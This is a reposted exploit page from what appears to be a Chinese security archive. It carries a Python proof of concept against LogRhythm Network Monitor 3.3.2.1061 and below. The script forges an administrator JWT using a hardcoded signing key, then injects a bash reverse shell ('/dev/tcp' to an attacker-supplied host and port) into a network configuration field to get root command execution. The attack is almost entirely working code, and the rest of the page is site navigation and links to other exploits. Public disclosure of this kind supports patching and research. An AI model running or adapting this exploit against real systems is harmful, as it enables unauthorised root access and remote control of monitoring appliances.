LogRhythm Network Monitor - Authentication Bypass / Command Injection

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

LogRhythm Network Monitor - Authentication Bypass / Command Injection

来源：http://security-assessment.com/ 作者：Oddo 发布时间：2017-05-10

# Exploit Title: LogRhythm Network Monitor Auth Bypass Root RCE
# Public Disclosure Date: 24 Apr 2017
# Author: Francesco Oddo
# Reference: http://security-assessment.com/files/documents/advisory/Logrhythm-NetMonitor-Advisory.pdf
# Software Link: https://logrhythm.com/network-monitor-freemium/
# Version: 3.3.2.1061 (latest) or below
# Tested On: nm_install_3.3.2.1061.iso with Freemium License (SHA256 7978f84e9fb18e2fae95f77a263801ca89b4767c95154b9ea874032081b02ce1)
# Dependencies: `pip install PyJWT`

import json
import requests
import argparse
import time
import jwt

def forge_jwt(rhost):
    print "[+] Forging JWT authentication token"
    key = 'Gluten-free 100% narwhal deserunt polaroid; quinoa keytar asymmetrical slow-carb plaid occaecat nostrud green juice dolor!'

    iat = time.time()
    exp = iat + 3600;

    body = json.loads('{"iat":1479893930,"exp":1479894830,"data":{"username":"admin","licensed":true,"role":"admin","timeToResetPass":false}}')
    body["iat"] = int(iat)
    body["exp"] = int(exp)

    token = jwt.encode(body, key, algorithm='HS512');
    return token

def command_inject(rhost, lhost, lport, gwhost, ifname):
    uri = "https://%s/data/api/configuration/" % rhost
    json_body = json.loads('{"type":"network","configurations":[{"name":"interface","value":"","isToggle":false},{"name":"method","value":true,"isToggle":true},{"name":"ipAddress","value":"","isToggle":false},{"name":"netMask","value":"255.255.255.0","isToggle":false},{"name":"gateway","value":"","isToggle":false},{"name":"dnsServers","value":"","isToggle":false},{"name":"searchDomains","value":"","isToggle":false}],"diffFields":["dnsServers"]}')
    payload = ";bash -i >& /dev/tcp/%s/%s 0>&1" % (lhost, lport)
        json_body["configurations"][0]["value"] = ifname
    json_body["configurations"][2]["value"] = rhost
    json_body["configurations"][3]["value"] = payload
    json_body["configurations"][4]["value"] = gwhost
    json_body["configurations"][5]["value"] = gwhost
    jwt = forge_jwt(rhost)
    auth_header = {'Token': jwt}
    print "[+] Initiating reverse shell via command injection at %s:%s" % (lhost, lport)
    requests.post(url=uri, json=json_body, headers=auth_header, verify=False)

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='LogRhythm Network Monitor Root Remote Command Execution PoC')
    parser.add_argument('--rhost', help='RHOST IP address')
    parser.add_argument('--lhost', help='LHOST IP address')
    parser.add_argument('--lport', help='LPORT')
    parser.add_argument('--gwhost', help='Gateway IP address')
    parser.add_argument('--ifname', help='Target Interface Identifier', default='enp0s3')
    args = parser.parse_args()

    command_inject(args.rhost, args.lhost, args.lport, args.gwhost, args.ifname)

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告